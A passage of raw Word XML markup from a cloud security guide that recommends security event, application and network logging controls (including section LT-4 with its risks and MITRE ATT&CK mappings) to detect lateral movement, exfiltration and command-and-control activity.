        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00846148">
        <w:t>Deploy Azure Monitor Agent to Windows and Linux virtual machines to collect Security Event Logs, Syslog, performance counters, and custom log files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392C70AF" w14:textId="354822DB" w:rsidR="00846148" w:rsidRDefault="00846148">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="193"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00846148">
        <w:t>Collect Windows security events</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D242BF" w14:textId="39C49B04" w:rsidR="00846148" w:rsidRDefault="00846148" w:rsidP="00001F1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00846148">
        <w:t>Configure Windows Event Log collection for security-relevant events including authentication attempts (Event ID 4624, 4625), privilege escalation (4672, 4673), account management (4720, 4726, 4738), and audit policy changes (4719)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12754478" w14:textId="50674C69" w:rsidR="00846148" w:rsidRDefault="00846148">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="193"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00846148">
        <w:t>Gather Linux system logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DDD6035" w14:textId="0DF7CC22" w:rsidR="00846148" w:rsidRDefault="00846148">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00846148">
        <w:t>Configure Linux Syslog collection for authentication logs (/var/log/auth.log, /var/log/secure), system logs (/var/log/syslog, /var/log/messages), and application-specific security logs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D3EE7E" w14:textId="78C4CCA7" w:rsidR="00846148" w:rsidRDefault="00846148">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="193"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00846148">
        <w:t>Monitor endpoint protection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D619E00" w14:textId="0C55E052" w:rsidR="00846148" w:rsidRDefault="00846148">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00846148">
        <w:t>Enable antimalware monitoring for Windows virtual machines to log malware detection events, scan results, signature updates, and policy violations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6EF7EB" w14:textId="2FA0DD10" w:rsidR="00846148" w:rsidRDefault="00846148">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="193"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00846148">
        <w:t>Implement structured logging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C52996E" w14:textId="48CA07C2" w:rsidR="00846148" w:rsidRDefault="00846148" w:rsidP="00001F1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00846148">
        <w:t xml:space="preserve">Implement structured application logging with security context including user identity, source IP address, request ID, operation type, data classification labels, </w:t>
      </w:r>
      <w:r w:rsidRPr="00846148">
        <w:lastRenderedPageBreak/>
        <w:t>authorization decisions, and business transaction identifiers to support correlation and forensic analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378282FB" w14:textId="74BDCF71" w:rsidR="00846148" w:rsidRDefault="00846148">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="193"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00846148">
        <w:t>Enable APM telemetry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2103381B" w14:textId="0C892B3F" w:rsidR="00846148" w:rsidRDefault="00846148" w:rsidP="00001F1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00846148">
        <w:t>Enable Application Insights or equivalent application performance monitoring (APM) solutions to collect telemetry, exceptions, custom security events, distributed tracing for microservices, and dependency tracking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB086CF" w14:textId="03C71E33" w:rsidR="00846148" w:rsidRDefault="00846148">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="193"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00846148">
        <w:t>Log application security events</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5205F223" w14:textId="34E8F0ED" w:rsidR="00846148" w:rsidRDefault="00846148" w:rsidP="00001F1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00846148">
        <w:t>Configure application-layer security event logging including authentication attempts, authorization failures, input validation failures, privilege escalations, sensitive data access, and business logic security violations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDEAAC9" w14:textId="0C77BEDE" w:rsidR="00846148" w:rsidRDefault="00846148">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="193"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00846148">
        <w:t>Monitor web application attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E1C32B" w14:textId="6574900D" w:rsidR="00846148" w:rsidRDefault="00846148" w:rsidP="00001F1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00846148">
        <w:t>For web applications and APIs, log HTTP security headers, content security policy violations, CORS policy enforcement, and session management events to detect application-layer attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A689D6C" w14:textId="27CC235A" w:rsidR="00846148" w:rsidRDefault="00846148">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="193"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00846148">
        <w:t>Capture Layer 7 attack attempts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0606F2" w14:textId="3E02B5DF" w:rsidR="00846148" w:rsidRDefault="00846148" w:rsidP="00001F1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00846148">
        <w:t>Enable logging for API gateways and web application firewalls to capture Layer 7 attacks including SQL injection attempts, cross-site scripting (XSS), remote code execution attempts, local file inclusion, XML external entity (XXE) attacks, and business logic abuse patterns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C0D7C1" w14:textId="57AF7279" w:rsidR="00846148" w:rsidRDefault="00846148">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="193"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00846148">
        <w:t>Track API abuse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E200330" w14:textId="720C226C" w:rsidR="00846148" w:rsidRPr="00554D34" w:rsidRDefault="00846148" w:rsidP="001236AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00846148">
        <w:t>Configure logging for rate limiting enforcement, authentication failures, bot detection, and API abuse patterns supporting threat detection and incident response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159ABDE2" w14:textId="71F49815" w:rsidR="00606486" w:rsidRDefault="00606486" w:rsidP="00606486">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="65" w:name="_Toc242449528"/>
      <w:r w:rsidRPr="00606486">
        <w:t>LT-4: Enable network logging for security investigation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="65"/>
    </w:p>
    <w:p w14:paraId="4A9208B6" w14:textId="41C1E9D0" w:rsidR="00606486" w:rsidRDefault="00606486">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="194"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00606486">
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A44886" w14:textId="1D9BDD0A" w:rsidR="00606486" w:rsidRDefault="00606486" w:rsidP="00001F1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00606486">
        <w:t>Enable network traffic logging including flow logs, firewall decision logs, web application firewall events, and DNS queries to support incident investigation and threat detection. Network logs provide forensic evidence for lateral movement, command-and-control communications, data exfiltration, and policy violations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4168D7EB" w14:textId="3A70BDD5" w:rsidR="00606486" w:rsidRDefault="00606486">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="194"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00606486">
        <w:t xml:space="preserve">Risk </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00606486">
        <w:t>to mitigate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="423979C8" w14:textId="2D462B02" w:rsidR="00606486" w:rsidRDefault="00606486" w:rsidP="00001F1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00606486">
        <w:t>Lateral movement blindness</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CBC434" w14:textId="25EAFCCE" w:rsidR="00606486" w:rsidRDefault="00606486" w:rsidP="00F84C77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="195"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00606486">
        <w:t>Attackers pivot across subnets, between VMs, or from compute to data services without leaving network flow evidence—preventing identification of east-west traffic anomalies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39650ACE" w14:textId="033316B7" w:rsidR="00606486" w:rsidRDefault="00606486">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00606486">
        <w:t>Exfiltration path opacity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120F4DCD" w14:textId="590AE599" w:rsidR="00606486" w:rsidRDefault="00606486" w:rsidP="00F84C77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="195"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00606486">
        <w:lastRenderedPageBreak/>
        <w:t>Large-scale data transfers to external destinations, unusual egress patterns, or DNS tunneling proceed undetected absent flow logs and firewall traffic analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152E4574" w14:textId="6A2F741A" w:rsidR="00606486" w:rsidRDefault="00606486">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00606486">
        <w:t>Application-layer attacks invisible</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648F0999" w14:textId="0773C131" w:rsidR="00606486" w:rsidRDefault="00606486" w:rsidP="00F84C77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="195"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00606486">
        <w:t>SQL injection attempts, web shell uploads, API abuse, or protocol manipulation bypass detection when WAF logs, application gateway logs, and Layer 7 inspection are disabled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FF165A" w14:textId="39A1977A" w:rsidR="00606486" w:rsidRDefault="00606486">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00606486">
        <w:t>C2 communications undetected</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B023178" w14:textId="0FCAC8B2" w:rsidR="00606486" w:rsidRDefault="00606486" w:rsidP="00F84C77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="195"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00606486">
        <w:t>Command-and-control beaconing, callback patterns, or tunneled protocols evade detection without DNS query logs and network connection baselines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2470BF66" w14:textId="2426661E" w:rsidR="00606486" w:rsidRDefault="00606486">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00606486">
        <w:t>Policy violation invisibility</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C41751" w14:textId="559C7FE0" w:rsidR="00606486" w:rsidRDefault="00606486" w:rsidP="00F84C77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="195"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00606486">
        <w:t>Traffic that violates network segmentation, accesses unauthorized ports/protocols, or bypasses firewall rules proceeds unmonitored, eroding zero-trust boundaries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6170E5E9" w14:textId="2B765128" w:rsidR="00606486" w:rsidRDefault="00606486">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00606486">
        <w:t>Compliance gaps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25BEBECC" w14:textId="472BDC9E" w:rsidR="00606486" w:rsidRDefault="00606486" w:rsidP="00F84C77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="195"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00606486">
        <w:t>Regulatory standards (PCI-DSS 10.8, NIST AU-12) mandate network activity logging and monitoring—absent logs create audit findings and certification risks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE49576" w14:textId="4D4EB74E" w:rsidR="00606486" w:rsidRDefault="00606486" w:rsidP="00001F1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00606486">
        <w:t>Incident reconstruction failure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B2B1E3" w14:textId="5A0A779F" w:rsidR="00606486" w:rsidRDefault="00606486" w:rsidP="00F84C77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="195"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00606486">
        <w:t>Post-breach forensics cannot determine attacker origin IP, lateral movement paths, or data exfiltration routes without comprehensive network flow and firewall decision logs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390FE7EA" w14:textId="4E501AC4" w:rsidR="007A168D" w:rsidRDefault="007A168D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="194"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007A168D">
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CC3859" w14:textId="31F80AF0" w:rsidR="007A168D" w:rsidRDefault="007A168D" w:rsidP="00001F1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="007A168D">
        <w:t>Command &amp; Control (TA0011)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FA1EFD" w14:textId="174A6B99" w:rsidR="00B83BFA" w:rsidRDefault="00B83BFA" w:rsidP="00F84C77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="396"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00B83BFA">
        <w:t>application layer protocol (T1071) using HTTP/HTTPS or other standard protocols to blend C2 traffic with legitimate communications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B5C400" w14:textId="60F39896" w:rsidR="007A168D" w:rsidRDefault="007A168D" w:rsidP="00F84C77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="007A168D">
        <w:t>Command &amp; Control (TA0011)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B4E611" w14:textId="226C09C3" w:rsidR="00B83BFA" w:rsidRDefault="00B83BFA" w:rsidP="00F84C77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="396"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00B83BFA">
        <w:t>DNS (T1071.004) leveraging DNS queries for C2 channels or data exfiltration tunnels.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71604D28" w14:textId="6A1B37A7" w:rsidR="007A168D" w:rsidRDefault="007A168D" w:rsidP="00001F1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="007A168D">
        <w:t>Lateral Movement (TA0008)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66567EB7" w14:textId="2EB80D32" w:rsidR="00B83BFA" w:rsidRDefault="00B83BFA" w:rsidP="00F84C77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="396"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00B83BFA">
        <w:t>remote services (T1021) moving between systems using RDP, SSH, or cloud management protocols.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402C35FE" w14:textId="2CF18BB3" w:rsidR="007A168D" w:rsidRDefault="007A168D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007A168D">
        <w:t>Exfiltration (TA0010)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E588AEA" w14:textId="79571710" w:rsidR="00B83BFA" w:rsidRDefault="00B83BFA" w:rsidP="00F84C77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="396"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00B83BFA">
        <w:t>exfiltration over C2 channel (T1041) streaming stolen data through established command-and-control connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03ECFBE2" w14:textId="275FF8F0" w:rsidR="007A168D" w:rsidRDefault="007A168D" w:rsidP="00F84C77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="007A168D">
        <w:t>Exfiltration (TA0010)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C73CAA5" w14:textId="63914D32" w:rsidR="00B83BFA" w:rsidRDefault="00B83BFA" w:rsidP="00F84C77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="396"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00B83BFA">
        <w:lastRenderedPageBreak/>
        <w:t>exfiltration over alternative protocol (T1048) using non-standard ports or protocols to evade egress monitoring.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116E48EF" w14:textId="4B2CF67D" w:rsidR="007A168D" w:rsidRDefault="007A168D" w:rsidP="00F84C77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="007A168D">
        <w:t>Defense Evasion (TA0005)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D48843A" w14:textId="069A5F4B" w:rsidR="00B83BFA" w:rsidRDefault="00B83BFA" w:rsidP="00F84C77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="396"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00B83BFA">
        <w:t>protocol tunneling (T1572) encapsulating malicious traffic within legitimate protocols (DNS, HTTPS) to bypass inspection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F711D63" w14:textId="5D624E41" w:rsidR="00D32901" w:rsidRDefault="00DC2CC4" w:rsidP="00DC2CC4">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC2CC4">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>LT-4.1: Enable network security logging and monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C74E62" w14:textId="230AF133" w:rsidR="00DC2CC4" w:rsidRDefault="00DC2CC4" w:rsidP="00F84C77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00DC2CC4">
        <w:t>Capture comprehensive network traffic telemetry to detect lateral movement, data exfiltration, command-and-control communications, and application-layer attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F041A11" w14:textId="0D0506BA" w:rsidR="00DC2CC4" w:rsidRDefault="00DC2CC4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="196"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC2CC4">
        <w:t>Capture network flow logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E0D0D0" w14:textId="381CD2FB" w:rsidR="00DC2CC4" w:rsidRDefault="00DC2CC4" w:rsidP="00F84C77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00DC2CC4">
        <w:t>Enable network security group (NSG) flow logs to capture information about IP traffic flowing through NSGs including source/destination IPs, ports, protocols, and allow/deny decisions for lateral movement detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A483C6C" w14:textId="77CDC1B7" w:rsidR="00DC2CC4" w:rsidRDefault="00DC2CC4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="196"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC2CC4">
        <w:t>Monitor firewall activities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDF87CD" w14:textId="59BBA246" w:rsidR="00DC2CC4" w:rsidRDefault="00DC2CC4" w:rsidP="00F84C77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00DC2CC4">
        <w:t>Enable Azure Firewall logs and metrics to monitor firewall activity, rules processing, threat intelligence hits, and DNS proxy logs for centralized egress monitoring and threat detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462AEA6A" w14:textId="34292CC4" w:rsidR="00DC2CC4" w:rsidRDefault="00DC2CC4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="196"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC2CC4">
        <w:t>Log application-layer attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2C69DE" w14:textId="538FC226" w:rsidR="00DC2CC4" w:rsidRDefault="00DC2CC4" w:rsidP="00F84C77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00DC2CC4">
        <w:t>Enable Web Application Firewall (WAF) logs to capture application-layer attack attempts including SQL injection, cross-site scripting, and OWASP Top 10 violations with request details and blocking decisions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB43032" w14:textId="3448EA96" w:rsidR="00DC2CC4" w:rsidRDefault="00DC2CC4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="196"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC2CC4">
        <w:t>Collect DNS query data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE79DE2" w14:textId="573451A6" w:rsidR="00DC2CC4" w:rsidRDefault="00DC2CC4" w:rsidP="00F84C77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00DC2CC4">
        <w:t>Collect DNS query logs to assist in correlating network data and detecting DNS-based attacks including tunneling, DGA domains, and command-and-control communications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B06A84D" w14:textId="26A6107F" w:rsidR="00DC2CC4" w:rsidRDefault="00DC2CC4">
      <w:pPr>
